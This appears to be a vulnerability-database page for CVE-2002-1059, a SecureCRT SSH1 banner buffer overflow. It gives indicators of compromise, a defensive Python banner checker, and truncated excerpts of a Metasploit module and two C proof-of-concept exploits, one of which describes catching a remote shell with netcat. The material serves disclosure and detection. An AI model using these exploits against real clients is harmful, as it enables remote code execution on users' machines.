CVE-2002-1059
Published 2002-10-04
Priority: P3 (47) · Severity: high · CVSS 2.0 base score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit available · EPSS: 60.30% (99.0th percentile)
Buffer overflow in Van Dyke SecureCRT SSH client before 3.4.6, and 4.x before 4.0 beta 3, allows an SSH server to execute arbitrary code via a long SSH1 protocol version string.
Affected: 19 ranges, all for the same vendor and product (version bounds not captured in this record)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| van_dyke_technologies | securecrt | — | — |
Detection & IOCs (extracted from sources)
- bytes: \xb8\x00\x03\xff\xe0
- bytes: \xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90
- Detect oversized SSH1 protocol identifier strings (more than roughly 250 bytes) sent by a server to a client: the malicious payload begins with 'SSH-1.1-' followed by a long padding of repeated characters or shellcode.
- Flag SSH1 server banner responses exceeding normal length (>50 bytes) on port 22 or 9988 directed at SecureCRT clients; the Metasploit module sends 243 bytes of random English text after the banner prefix.
- Monitor for rogue SSH servers listening on non-standard port 9988 (used by both PoC exploits) that send SSH-1.x banner strings to connecting clients.
- The exploit targets SecureCRT.exe version 3.4.4 with a hardcoded return address 0x0041b3e0; presence of this RET value in network traffic (little-endian: \xe0\xb3\x41\x00) within an SSH1 banner is a strong indicator of exploitation.
- The EXITFUNC is set to 'process', meaning shellcode execution terminates the process; look for SecureCRT.exe crashing or spawning unexpected child processes after an SSH1 connection attempt.
- The Metasploit module has only a single target (SecureCRT 3.4.4) with one hardcoded return address; other vulnerable versions (up to 4.0 Beta 2) are not covered and would require different RET values.
- The payload space is limited to 400 bytes with null bytes as bad characters; shellcode must avoid \x00.
- A stack adjustment of -3500 is required for the payload to execute correctly, which is an unusually large negative adjustment that may affect reliability on different stack layouts.
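As an added defensive example (not code from this page or from any of the exploit authors), the banner-length and byte-pattern hints above applied to constructed server greetings; the thresholds follow the indicators listed above, and the function name and sample banners are my own.

```python
# Added example: classify the first line an SSH server sends to a client using the
# indicators listed above. Sample banners below are constructed for illustration.

# Byte sequences listed on the page as indicators of this exploit.
RET_LE = b"\xe0\xb3\x41\x00"  # 0x0041b3e0 (SecureCRT 3.4.4 RET), little-endian
IOC_BYTES = [
    b"\xb8\x00\x03\xff\xe0",
    b"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90",
]
NORMAL_LEN = 50      # an SSH1 banner longer than this is unusual (page heuristic)
OVERSIZED_LEN = 250  # roughly where the PoC payloads sit (page heuristic)


def check_server_banner(data: bytes) -> dict:
    """Inspect a server-to-client SSH greeting and return a findings dict."""
    banner = data.split(b"\n", 1)[0]  # identifier string ends at the first newline
    findings = {
        "banner_len": len(banner),
        "ssh1": banner.startswith(b"SSH-1."),
        "flags": [],
    }
    if not findings["ssh1"]:
        return findings  # SSH-2.0 greetings are not the vector for this CVE
    if len(banner) > OVERSIZED_LEN:
        findings["flags"].append("oversized_ssh1_banner")
    elif len(banner) > NORMAL_LEN:
        findings["flags"].append("long_ssh1_banner")
    if RET_LE in data:
        findings["flags"].append("securecrt_3.4.4_ret")
    if any(pattern in data for pattern in IOC_BYTES):
        findings["flags"].append("known_exploit_bytes")
    return findings


# Constructed samples: a normal SSH1-compatible banner, and one shaped like the
# PoC (prefix plus padding, followed by the little-endian RET value).
BENIGN = b"SSH-1.99-OpenSSH_3.4p1\n"
MALICIOUS = b"SSH-1.1-" + b"A" * 300 + RET_LE + b"\n"

if __name__ == "__main__":
    for sample in (BENIGN, MALICIOUS):
        print(check_server_banner(sample))
```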
No detection rules found.
Exploit-DB: SecureCRT 4.0 Beta 2 SSH1 - Remote Buffer Overflow (Metasploit) (exploitdb, 2010-04-30)
---
```ruby
##
# $Id: securecrt_ssh1.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

# The listing is garbled in the source between the class line and the module
# metadata; the class header follows the standard Metasploit layout and the
# Name and Description values are those given in the module summary on this page.
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SecureCRT SSH1 Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in SecureCRT <= 4.0 Beta 2.
        By sending a vulnerable client an overly long SSH1 protocol identifier
        string, it is possible to execute arbitrary code. This module has only
        been tested on SecureCRT 3.4.4.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9179 $',
      'References'     =>
        [
          [ 'CVE', '2002-1059' ],
          [ 'OSVDB', '4991' ],
          [ 'BID', '5287' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'           => 400,
          'BadChars'        => "\x00",
          'MaxNops'         => 0,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      # ... listing truncated here in the source
```
Exploit-DB: SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (1) (exploitdb, 2002-07-23)
---
// source: https://www.securityfocus.com/bid/5287/info
The SecureCRT client is prone to a buffer-overflow condition when attempting to handle an overly long SSH1 protocol identifier string. Reportedly, an attacker can exploit this issue via a malicious server.
Exploiting this issue may allow an attacker to execute arbitrary code or may cause the client to crash.
```c
/* Header names were stripped from the listing; the standard headers the
   visible code needs are supplied here. */
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define PORT 9988

int main(int argc, char **argv) {
    int s, n, i, sz = sizeof(struct sockaddr_in);
    struct sockaddr_in local, whatever;
    char payload[510];

    /* SSH1 identifier string: "SSH-1.1-" followed by 500 bytes of 'A' padding,
       then the newline that terminates the version string */
    strcpy(payload, "SSH-1.1-");
    for (i = 8; i < 508; i++)
        payload[i] = 'A';
    payload[508] = '\n';
    payload[509] = '\0';

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    /* ... listing truncated here in the source */
```
Exploit-DB: SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (2) (exploitdb, 2002-07-23)
---
// source: https://www.securityfocus.com/bid/5287/info
```c
// The bug was discovered by Kyuzo
// The shellcode exploit was coded by Andrea Lisci
// The program works in the following way:
//
// run the exploit
// ./shellcode
// run netcat
// nc -l -p
// connect from SecureCRT to port 9988 using SSH version 1
//
// the remote shell will be opened on the netcat computer

/* Header names were stripped from the listing; standard socket headers assumed. */
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#d /* ... listing truncated here in the source */
```
Metasploit: SecureCRT SSH1 Buffer Overflow
This module exploits a buffer overflow in SecureCRT <= 4.0 Beta 2. By sending a vulnerable client an overly long SSH1 protocol identifier string, it is possible to execute arbitrary code. This module has only been tested on SecureCRT 3.4.4.
No writeups or analysis indexed.
References
- http://marc.info/?l=bugtraq&m=102744150718462&w=2
- http://marc.info/?l=bugtraq&m=102746007908689&w=2
- http://www.iss.net/security_center/static/9650.php
- http://www.osvdb.org/4991
- http://www.securityfocus.com/bid/5287
- http://www.vandyke.com/products/securecrt/security07-25-02.html